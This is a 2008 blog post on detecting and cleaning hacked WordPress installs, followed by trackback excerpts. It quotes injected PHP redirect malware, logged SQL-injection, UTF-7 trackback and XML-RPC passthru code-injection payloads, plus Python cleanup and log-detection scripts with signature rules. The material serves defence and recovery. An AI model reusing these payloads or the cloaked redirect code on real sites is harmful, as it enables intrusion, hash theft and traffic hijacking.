Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs. You did upgrade, didn't you? No? Then it was inevitable that you'd be hacked. If you haven't been hacked yet, it's only a matter of time.
Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.
In the last week the hackers have started again. There is no zero-day WordPress exploit, and there is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They're using the old exploits all over again. This time they're hijacking search traffic: visitors who arrive at your blog from Google are redirected to your-needs.info or anyresults.net (the base64 string in the snippet below decodes to anyresults.net).
If you’ve been hacked
- Upgrade to the latest version of WordPress.
- Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
- Change your passwords after upgrading and make sure the hacker didn’t create another user.
- Edit your wp-config.php and change or create the SECRET_KEY definition. WordPress 2.5 mixes it into the hash that signs login cookies, so a new key invalidates every existing session, including any the attacker still holds. It should look like this, but do not use the same key or it won't be very secret, will it?
define('SECRET_KEY', '1234567890');
Hidden Code
The bad guys are using a number of ways to hide their hacks:
- The simplest way is hiding their code in your PHP scripts. If your blog directory and files are writable by the webserver then a hacker has free rein to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won't be overwritten, so make sure you double-check those files for any strange code that uses the eval() command or base64_decode(). Here's a code snippet taken from here, reformatted for readability (behaviour unchanged):
<?php
// Injected code. Step 1: did the visitor arrive from a search engine or a big portal?
$seref = array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser = 0;
foreach ($seref as $ref)
    if (strpos(strtolower($_SERVER['HTTP_REFERER']), $ref) !== false) { $ser = "1"; break; }
// Step 2: only redirect visitors with no cookies at all. A logged-in blog owner always
// has cookies, so the owner never sees the redirect and the hack stays hidden.
if ($ser == "1" && sizeof($_COOKIE) == 0) {
    header("Location: http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");   // decodes to anyresults.net
    exit;
}
?><?php
The trailing <?php is the file's own opening tag, which the injected block was pasted in front of. Because of the cookie check you won't see the redirect while logged in; to reproduce it, request a page with a Google referer and no cookies and look for the 302 to anyresults.net.
Another hack adds different code to your PHP files. Look for k1b0rg or keymachine.de in your PHP scripts and remove that offending code if you find it.
- Check your .htaccess file in the root of your blog. If you've never edited it, it should look like this:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
That file may have this chunk of code too, which is to do with the uploader:
<IfModule mod_security.c>
<Files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</Files>
</IfModule>
- They're also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
- Open phpMyAdmin, go to your blog's options table and find the active_plugins record.
- Edit that record. It's a long line. Scroll through it and you'll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you also remove the serialized array information for that entry: the i:N; key and the s:NN: byte length in front of it, and lower the a:NN: element count at the very start, otherwise the array won't unserialize and WordPress will treat the option as empty. If that's beyond you, just delete the active_plugins record and reactivate all your plugins again.
- Check your uploads directory for that jpg file and delete it.
- This YouTube video shows how to do that. I don't think there's any urgent need to remove the rss_* database record, but it won't hurt to do it.
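Editing the active_plugins row by hand is fiddly because PHP's serialized format stores each string's byte length and the array's element count, and one stale number makes unserialize() fail. The following is an added example, not WordPress code: it parses the serialized list, drops every entry that is not a plain `file.php` or `dir/file.php` path inside the plugins directory, and re-serializes the rest with correct lengths and renumbered keys (which is what WordPress does itself when you reactivate plugins). The sample row is constructed from the entry quoted above plus one genuine plugin; the UPDATE statement assumes the default wp_ table prefix.

```python
import re

ARRAY_HEAD = re.compile(rb"a:(\d+):\{")
ENTRY_HEAD = re.compile(rb'i:(\d+);s:(\d+):"')


def parse_php_string_list(blob):
    """Parse a PHP serialize()d array of strings with integer keys into a Python list.

    Only the shape WordPress uses for active_plugins is supported; anything else raises.
    """
    head = ARRAY_HEAD.match(blob)
    if not head:
        raise ValueError("not a serialized PHP array")
    count, pos, items = int(head.group(1)), head.end(), []
    for _ in range(count):
        entry = ENTRY_HEAD.match(blob, pos)
        if not entry:
            raise ValueError("unsupported entry at byte %d" % pos)
        length, start = int(entry.group(2)), entry.end()
        value = blob[start:start + length]          # length is in bytes, hence bytes slicing
        if blob[start + length:start + length + 2] != b'";':
            raise ValueError("string length does not match at byte %d" % start)
        items.append(value.decode("utf-8"))
        pos = start + length + 2
    if blob[pos:pos + 1] != b"}":
        raise ValueError("array not terminated")
    return items


def serialize_php_string_list(items):
    """Inverse of parse_php_string_list; keys are renumbered 0..n-1 as WordPress would."""
    body = b"".join(
        b'i:%d;s:%d:"%s";' % (i, len(v.encode("utf-8")), v.encode("utf-8"))
        for i, v in enumerate(items)
    )
    return b"a:%d:{%s}" % (len(items), body)


def is_plausible_plugin(entry):
    """A real entry is 'file.php' or 'dir/file.php' relative to wp-content/plugins,
    never absolute and never climbing out of that directory."""
    parts = entry.split("/")
    return (entry.endswith(".php") and not entry.startswith("/")
            and ".." not in parts and "" not in parts)


def clean_active_plugins(blob):
    """Return (cleaned serialized value, list of removed entries)."""
    items = parse_php_string_list(blob)
    keep = [p for p in items if is_plausible_plugin(p)]
    removed = [p for p in items if not is_plausible_plugin(p)]
    return serialize_php_string_list(keep), removed


# Constructed sample of the row: one genuine plugin and the disguised upload from the post.
SAMPLE_ROW = serialize_php_string_list(
    ["akismet/akismet.php", "../uploads/2008/05/04/jhjyahjhnjnva.jpg"]
)

if __name__ == "__main__":
    cleaned, removed = clean_active_plugins(SAMPLE_ROW)
    print("removed:", removed)
    print("UPDATE wp_options SET option_value = '%s' WHERE option_name = 'active_plugins';"
          % cleaned.decode())
```

Paste the real option_value from phpMyAdmin in place of `SAMPLE_ROW`; the parser refuses anything whose lengths do not add up, so a row that has already been damaged by hand-editing is reported rather than made worse.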
Change Your Passwords
Once you’ve upgraded and verified that your install is clean again you must do the following:
- Change the passwords of all users on your system.
- Make sure the hacker hasn’t added another user account he can use to login again.
Stop the bad guys
Regular backups won't stop the bad guys, but they mean you can recover, and an intrusion detection system (IDS) that watches your files tells you something has changed before the damage spreads.
- I use BackupPC to back up all my servers every night, and a simple MySQL backup script to dump the database daily.
- The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I’ll get an email within a day about it. It does take some fine tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):
# apt-get install aide
# vi /etc/aide/aide.conf.d/88_aide_web
# /usr/sbin/aideinit
In the configuration file above I put the following:
/home/web/ Checksums
!/home/www/logs/.*
!/home/web/public_html/wp-content/cache/.*
!/home/web/.*/htdocs/wp-content/cache/.*
That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.
Please Upgrade
There is absolutely no reason not to upgrade. WordPress is famous for its 5-minute install, but it takes time and effort to maintain it. If you don't want the hassle of upgrading, or don't know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn't an advert for WordPress.com, go with any blogging system you like, but don't make life easy for the scum out there who'll take over your out-of-date software and use it to their advantage.
Help a friend
Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:
<meta name="generator" content="WordPress 2.5.1" /> <!-- leave this for stats -->
What does a hack look like?
I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.
Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)” which strangely enough doesn’t show up on Google at all right now.
- First the attacker visits your Dashboard, and then, without even checking whether that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
- Then he POSTs to wp-admin/admin-ajax.php with the following POST body (%27 is a single quote, so these cookie values are an injection attempt, not a real login):
POST: Array
(
[cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
)
- When that fails, he grabs xmlrpc.php.
- He then POSTs to that script, exploiting an old and long-fixed bug. Here's a snippet of the data:
HTTP_RAW_POST_DATA: <?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>
<member><name>params</name><value><array><data>
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
</data></array></value></member>
- That fails too, so the query is repeated with similar SQL, this time trying to pull the password hash out of wp_users one character at a time:
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
- Then he tries a trackback:
URL: /wp-trackback.php?tb_id=1
POST: Array
(
[title] => 1
[url] => 1
[blog_name] => 1
[tb_id] => 666666\'
[1740009377] => 1
[496546471] => 1
)
- And another trackback. +AFw- is the UTF-7 encoding of a backslash: once the string is converted from the declared charset, that backslash cancels the escaping added to the quote, so the quote reaches the SQL unescaped. This too was fixed long ago:
URL: /wp-trackback.php?p=1
POST: Array
(
[url] => ekibastos
[title] => ekibastos
[excerpt] => ekibastos
[blog_name] => +AFw-\')/*
[charset] => UTF-7
)
- Before finally going back to xmlrpc.php with this POST request:
<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>k1b0rg' icq: 76-86-20</string></value></param>
<param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
<param><value><string>admin</string></value></param>
</params>
</methodCall>
- In between, he also tries the following GET requests (the double-encoded %2527 is a single quote, and the UNION SELECT tries to print the admin password hash into the page):
GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1
- Thankfully I upgraded and all those attacks fail.
Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.
PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.
<?xml version="1.0"?>
<methodCall>
<methodName>test.method</methodName>
<params>
<param>
<value><name>','')); echo
'______BEGIN______';
passthru('id');
echo
'_____FIM_____';
exit;/*</name></value>
</param>
</params>
</methodCall>
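The requests above (and the test.method one in the P.S.) are easy to pick out of a log once you know the shapes: UNION SELECT and ord(substring(user_pass,...)) probes against wp_users, a trackback declaring charset=UTF-7, forged wordpressuser_/wordpresspass_ cookies, and PHP function calls inside an XML-RPC body. The following is an added example, not code from the post: a small rule set and a triage function run over constructed requests that reproduce the sequence described above (the IP addresses and the k1b user agent are the ones quoted in the post; 203.0.113.7 is a documentation address used for the benign request). Matching runs on the raw text and on singly and doubly URL-decoded copies, so %2527 is caught as a quote.

```python
import re
from urllib.parse import unquote_plus

# Signatures distilled from the requests shown above.  They flag an attempt, not a
# successful break-in; an up-to-date install answers all of them with an error.
RULES = [
    ("sql-injection", re.compile(r"union\s+(all\s+)?select|\bord\(|substring\(|char\(", re.I)),
    ("wp_users-probe", re.compile(r"user_pass|wp_users", re.I)),
    ("utf7-trackback", re.compile(r"charset=UTF-7|\+AFw-", re.I)),
    ("xmlrpc-code-injection", re.compile(r"passthru\(|shell_exec\(|system\(|exec\(", re.I)),
    ("cookie-tampering", re.compile(r"wordpress(user|pass)_[0-9a-f]{32}=", re.I)),
    ("k1b0rg-ua", re.compile(r"k1b compatible|k1b0rg", re.I)),
]


def classify(req):
    """Return the sorted rule names matching one request dict (method, path, body, ua, ip)."""
    raw = "\n".join([req["path"], req.get("body", ""), req.get("ua", "")])
    once = unquote_plus(raw)            # %27 -> '
    twice = unquote_plus(once)          # %2527 -> %27 -> '
    haystack = "\n".join([raw, once, twice])
    return sorted(name for name, rx in RULES if rx.search(haystack))


def triage(requests):
    """Return (ip, method, path, tags) for every request that matched at least one rule."""
    hits = []
    for req in requests:
        tags = classify(req)
        if tags:
            hits.append((req["ip"], req["method"], req["path"], tags))
    return hits


K1B_UA = "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

# Constructed requests reproducing the sequence described in the post.
SAMPLE_REQUESTS = [
    {"ip": "87.118.100.81", "method": "GET", "ua": K1B_UA,
     "path": "/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))"
             "+FROM+wp_users+where+id=1/*"},
    {"ip": "87.118.100.81", "method": "POST", "ua": K1B_UA, "path": "/wp-trackback.php?p=1",
     "body": "url=ekibastos&title=ekibastos&excerpt=ekibastos&blog_name=+AFw-\\')/*&charset=UTF-7"},
    {"ip": "87.118.100.81", "method": "POST", "ua": K1B_UA, "path": "/xmlrpc.php",
     "body": "<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>"
             "<value><struct><member><name>methodName</name><value><string>pingback.extensions.getPingbacks"
             "</string></value></member><member><name>params</name><value><array><data><value><string>"
             "http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3"
             " FROM wp_users WHERE ID=1%2F*</string></value></data></array></value></member></struct></value>"
             "</data></array></value></param></params></methodCall>"},
    {"ip": "87.118.100.81", "method": "POST", "ua": K1B_UA, "path": "/wp-admin/admin-ajax.php",
     "body": "cookie=wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27;"
             " wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;"},
    {"ip": "189.3.105.2", "method": "POST", "ua": "Mozilla/4.0", "path": "/xmlrpc.php",
     "body": "<methodCall><methodName>test.method</methodName><params><param><value><name>','')); echo"
             " '______BEGIN______'; passthru('id'); echo '_____FIM_____'; exit;/*</name></value>"
             "</param></params></methodCall>"},
    {"ip": "203.0.113.7", "method": "GET", "ua": "Mozilla/5.0 (X11; Linux x86_64)",
     "path": "/2008/06/08/did-your-wordpress-site-get-hacked/"},
]

if __name__ == "__main__":
    for ip, method, path, tags in triage(SAMPLE_REQUESTS):
        print(ip, method, path[:60], ",".join(tags))
```

A normal access log has no POST bodies, so the body-based rules only work with the kind of extra logging the post describes; the path and user-agent rules work on any Apache log. Treat the output as a list of IPs to look at, not as proof of compromise.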
Edit: Tripwire url fixed, thanks Callum
PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.
[...] Donncha O Caoimh posted a 6/8/2008 note about detecting whether your WP blog has been hacked, and some steps on dealing with it. [...]
[...] me however is one of the comments that i read at his website that points me to this other website, holy shmoly!, specifically, how secured is our wordpress?. Apparently there are some security flaws on previous [...]
[...] info here and here. On this site it took the form of links added into the template files, and with a display: [...]
[...] blogs running older versions of WordPress were hacked. Peter offers a way to have your site notify you when things are [...]
[...] previous post about hacked WordPress sites caused Donnacha to ask, After your last post on this subject, I was thinking that it would be a [...]
[...] old versions of the Wordpress script are vulnerable to various hacker attacks, Donncha published an article on the same topic few days back. Today he has released a plugin called Wordpress Exploit Scanner, [...]
[...] couple of weeks ago an article about hacked Wordpress sites came up in my Wordpress admin dashboard. I hadn’t been paying attention to all of the noise [...]
[...] 自WordPress 2.5发布以来,WordPress的开发blog和论坛里经常能看到关于WordPress安全性的讨论文章:1、2。其中谈到的黑客通常都是在blog上留下后台程序,或其他隐藏的恶意链接等。WordPress Exploit Scanner正是用于扫描WordPress是否被黑客留下了这些邪恶的东东。当然有些黑客爱删东西的,那就没办法了。 [...]
[...] a blogs que utilitzen WordPress que va fer que bastants d’aquests blogs quedessin inactius; Donncha O Caoimh va donar una sèrie de passos per saber si el teu blog havia estat atacat. Ara acaba de [...]
[...] website WSOS). It appears that hackers gained access to numerous out-of-date wordpress blogs (details and fixes here) and used wordpress to send many, many spam [...]
[...] Changes Notifications for Your Wordpress Blog on Linux Did your WordPress site get hacked? Three tips to protect your WordPress installation 10 Ways to Secure your Wordpress Install [...]
[...] I had been rather diligent in updating software but fell into a lull after 2.0.3 of WordPress. I rarely, if ever, check my stats so I’m not sure how long it has been happening, but something got hacked. If you run WordPress, check your stats and then go here. [...]
[...] on the site (it never was required) and did everything that the article I linked to yesterday from Holy Schmoly recommended. The hardest thing was to change the database table prefixes and while I found a script [...]
[...] also has a good technical analysis of the exploit in his post – Did your WordPress site get hacked? And JD posted how to manually get rid of the hacks – Patching the WordPress AnyResults.Net [...]
[...] upgraded the site to the latest version of WordPress. Unfortunately there was a vulnerability in the older version I was using which led to it being hacked by a bot. About 100k of links to a dodgy pharmacy site had [...]
[...] Did your WordPress site get hacked? deals with the latest exploit of the WordPress and how to fix it. [...]
[...] my RSS feed or by Email. Thanks for visiting!WordPress blogs are starting to get hacked in greater numbers lately. The problem is getting serious enough that the WordPress podcast recently addressed out of [...]
[...] erfahren musste. Eine ziemlich gute Anleitung zum richtigen Vorgehen findet sich zum Beispiel bei Holy Shmoly!. von BloggingTom, abgelegt unter BloggingPermalink | Trackback URI print it! | yigg it! | wong [...]
[...] empfehle ich natürlich meinen Retter BloggingTom (danke vielmals an dieser Stelle) und Holy Shmoly (englische Anleitung zum beheben von [...]
[...] on how to solve it and my head is about to burst. Lucky this site explains things clearer – Is your Wordpress hacked? They’re also uploading PHP code disguised as jpeg files to your upload directory and adding [...]
[...] code was placed in my theme’s header file, base64 encoded just as the article said it would [...]
[...] Did Your WordPress Site get Hacked? [...]
[...] the link given by Genkisan, I found this useful tutorial on ‘Did your Wordpress site get hacked?‘ They’re also uploading PHP code disguised as jpeg files to your upload directory and [...]
[...] If you noticed the site looking funny Sunday morning, it’s because I was reinstalling the blog software that I use, which is called WordPress. Some time in the last month or two this blog was hacked, through a vulnerability in WordPress that is described here. [...]
[...] where my blog is hacked by unknown attacker or two, I become a little bit paranoid. Thanks to Holy Shmoly, there is somewhat a definite guide on how to ‘harden’ your wordpress [...]
[...] Nik Cubrilovic wrote on TechCrunch about how a blog of his was hacked in June. He offers some interesting observations. For practical, WordPress-specific advice, there are a bunch of tips here and Donncha O Caoimh offers a technically-minded look at some of the issues. [...]
[...] Did your WordPress site get hacked? (tags: wordpress security) [...]
[...] Doncha’s excellent (and more recent) write-up of how to deal with a hacked WordPress installat… [...]
[...] One of the Wordpress developers posts: Did your WordPress site get hacked? [...]
[...] links from Kulpreet include WordPress Security White Paper, and “Did your WordPress site get hacked?” featuring samples of what a hacked site would look like. Digg it Add to del.icio.us [...]
[...] Did Your Wordpress site Get Hacked? >> Holy Shmoly! [...]
[...] Scanner 0.1 has been released, in response to a comment on a recent thread about old versions of WordPress sites being hacked. You may have spotted this in your WordPress dashboard. Problem is, it only works for v2.5.1+, so [...]
[...] Dat leek mij wel heel erg sterk, maar het was wel waar. Een hacker heeft een exploit in Wordpress gevonden en maakt daar nu dankbaar van gebruik. Wat er gebeurt is dat er een (onzichtbaar) commentaar aan de tekst van een link in een blogpost wordt toegevoegd. Op het moment dat je vervolgens de blogpost leest, probeert de browser de link te volgen. De link verwijst naar een gemene site ergens in China, waardoor in theorie de lezer een virus (Trojan Horse) kan krijgen. Meer informatie over de “exploit” is op de Wordpress site te vinden. Meer informatie (inclusief een script waarmee je de Wordpress installatie kunt controleren op exploits en hacks) kun je vinden op deze site. [...]
[...] {from bloggerguide.net} {from ocaoimh.ie} [...]
[...] will make it less likely. If you ever find yourself in the same situation as me check out this post. I found it very [...]
[...] read about this and took steps to recover my blog. The old theme is the culprit. I got rid of it and am upgrading [...]
[...] the most helpful article was Did Your Site Get Hacked. Why, yes it did. You might also consult Wordpress Security [...]
[...] suspect that this site was hacked by bots. I think that the culprit is an old plugin I never updated. That, and the security was [...]
[...] links A blog post about securing your wordpress blog How to upgrade your wordpress [...]
[...] links</em>:</strong> <a href=”http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/”>A blog post about securing your wordpress blog</a> <a [...]
[...] post that tells you how to know if your Wordpress blog has been hacked, and what to do about it: Holy Shmoly!. GREAT POST! Bookmark [...]
[...] my site had been hacked and had a stream of links to Anti-Virus sites above the top header. After a quick Google it turned out to be an easy fix, but it reminded me of my former days of scanning code for a [...]
[...] Vancouver Techie blogger Jan Karlsberg also has some advice for Wordpress bloggers (and companies running their websites off the Wordpress platform) to protect themselves with a little code review. He knows, because his Wordpress blog got hacked – and he fixed it. Some other Wordpress anti-hack tips here. [...]
[...] Most of the fixes are well beyond the scope of this blog. However, if you are mysql and php literate, you may want to start with this post at the wordpress.org forums and read Doncha’s post on Did Your Wordpress Site Get Hacked? [...]
[...] Did your WordPress site get hacked? – Donncha [...]
[...] Did your WordPress site get hacked? [...]
[...] WP site hacked? Holy Shmoley knows what to do. [...]
[...] Donncha (one of the original Wordpress founders, remember that name in your first blogroll?) for catching an insidious trick that’s inherent in some Wordpress templates. Irrelevant links on your site can drain off your [...]
[...] Blogs I look after got hacked again by an “online pharmacy”. Of course I’m not the only one. It was the second hack with 3 months of this WordPress [...]
[...] Blogs I look after got hacked again by an “online pharmacy”. Of course I’m not the only one. It was the second hack with 3 months of this WordPress [...]
[...] Holy Shmoly: Did Your Website Get Hacked? [...]
[...] found an article by Donncha, Did your WordPress site get hacked?. Fcuking A for [...]
[...] Did your Wordpress site get hacked? Malicious script injection on my [...]
[...] 1) reset your admin password by following the instructions above 2) immediately upgrade to the newest version of Wordpress 3) backup the database used for your blog. (usually you do this when upgrading, but if you’re a frequent blogger, backup more frequently. 3) create a new password that isn’t easy to break. include odd characters like ! +))^& and throw in an occasional upper case letter along with numbers. 4) check out the excellent suggestions at http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] these hacking problems and how to further protect yourselves from it, please read the detailed article made by Donncha O Caoimh, an Irish WordPress developer. In the meantime, I’ll be busy backing [...]
[...] these hacking problems and how to further protect yourselves from it, please read the detailed article made by Donncha O Caoimh, an Irish WordPress [...]
[...] Googling a number of times, I found this post which I think explains what happened to my site. I tried updating to the newest version but still, [...]
[...] til blogg, ftp og database. For andre WordPress bloggere vil jeg anbefalte å ta en titt på dette innlegget. (Takk til Kristin for linken via [...]
[...] http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] seperti di sini atau di sini. Atau ada tutorial lain lebih lengkap untuk kasus yang agak beda di sini atau reference dari blog ShoeMoney dengan kasus hampir mirip di sini dan lain-klain tentu di [...]
[...] those of you who want more: Read an interesting article about a Wordpress blog being [...]
[...] installs : If you’re affected by this, fix the issue, and then read Hardening Wordpress and Did your Wordpress Site get Hacked – both of which give a lot of starting points for research into how you can stop this happening [...]
[...] Click here to read post [...]
[...] do you feel threatened? Visit Holy Shmoly! for more [...]
[...] Update 17-03-09: All the problems have been fixed. In the end it was NOT a WordPress flaw; rather, another of the people who share the server with us installed some kind of application of dubious security, and very probably that allowed the server to be accessed and malicious code to be added to many of the PHP files of my WordPress installation. The solution to all this was provided to me in the thread I opened on the WordPress technical support forum, so I leave the link here for anyone it may help if they have suffered this same attack. Specifically, the site that provides the solutions is: http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] BlogSecurity is a blog that provides information about maintaining WordPress security. Holy Shmoly has a great blog post entitled “Did your WordPress Blog Get Hacked?” and it provides a [...]
[...] my sites: “Exploit Redirects Googlebot to Malware Sites (Bablo me uk)” and “Did your WordPress site get hacked?”, rather [...]
[...] this was quite a challenging task as I wasn’t sure what or where to look. I found this article which gave a few pointers. I have yet to follow all the instructions but this is what I’ve [...]
[...] First, download the latest version of WordPress and replace the system files with fresh copies. Then clean the malicious code out of the files that were added later (themes, plugins and the like). Change all your passwords, starting with the ones most closely tied to your website. Learn to generate good, usable passwords. This is a bit ironic, but keep your Windows secure. Luckily this did not happen only to me. If you are facing this situation too, you can make use of the links below: http://wordpress.org/support/topic/263085 http://wordpress.org/support/topic/261886 http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] You can read more about .htaccess from here. I checked my blog and it was working fine. CallingAllGeeks was up and running again. So, in all it [...]
[...] be on your blog, you can go through this list. If you want to know how a hacker works, this page is fairly good to read, though very [...]
[...] enough as we’re all vulnerable here. If you’re more tech savvy, here’s a post by Holy Shmoly! which tackles hacked php scripts on WordPress and how they look [...]
[...] Open source exploits: The open source platforms are now an easy target for hackers to exploit and use for malicious code. The last thing that we need is a hacked site with a very good SERP. If you are interested in a serious article, this is the place to go. http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]
[...] spam. I am not sure I cleaned everything that needed cleaning. But I did what I could. Here is more information to check whether you have the same problem. (Not you, Javi, I already confirmed you didn’t have the same [...]
[...] Did your WordPress site get hacked? [...]
[...] Well, it was clearly bad news: the site ajaxplorer.info was hacked on 13 July 2009, naturally just the night before an important gig, so I had to take it down for a few days. But the good news is that it had nothing to do with the AjaXplorer installed on the server; it was a WordPress security problem. My fault, I had not updated the WordPress install, and I will right now subscribe to the WordPress RSS feed urging you to upgrade when they find a problem. For those using WordPress, have a look here if you haven’t updated already: http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]
[...] Found another older post, but more good suggestions there. For example, I did review my .htaccess file and found it a bit [...]
[...] this hack news from June 2008 or March 2007 But this news .. news .. news .. news [...]
[...] recently, I followed some of the steps mentioned by Jaypee, Donncha O Caoimh and the WP [...]
[...] Did your WordPress site get hacked? [...]
[...] advice: Holy Shmoly! and My Digital [...]
[...] http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]
[...] How To Completely Clear Your Hacked WordPress Installation, Hardening WordPress, Did Your WordPress Site Get Hacked?, 20 WordPress Security Plugins (don’t overdo it, though) [...]
[...] you think you’ve been hacked, I’ve spotted a couple of useful guides to dealing with the aftermath. WordPress, php hack, php, security, [...]
[...] went to WordPress support for suggestions, and found a few helpful links (Lorelle)(Donncha). I learned from Lorelle - btw, everyone who uses WordPress should know Lorelle! - that [...]
[...] Holy Shmoly recommends keeping updated to the latest version of WordPress to protect against hackers. In addition to that, you should also change your passwords, remove any other users, change your WordPress config “secret key” and delete any malicious code left by the hacker which may allow them to get in again in the future. If you’re like me and have no idea how to find malicious scripts, Holy Shmoly also explains how you can identify and remove them. [...]
[...] as well go all the way and have longer (and more complicated) passwords created. Good References http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ http://enthusiasm.cozy.org/archives/2010/01/argh-blog-hacked [...]
[...] http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ http://forum.kaspersky.com/lofiversion/index.php/t104035.html [...]
[...] Did your WordPress Site get hacked is a good pointer to fixing things. It is pretty insidious what can happen: [...]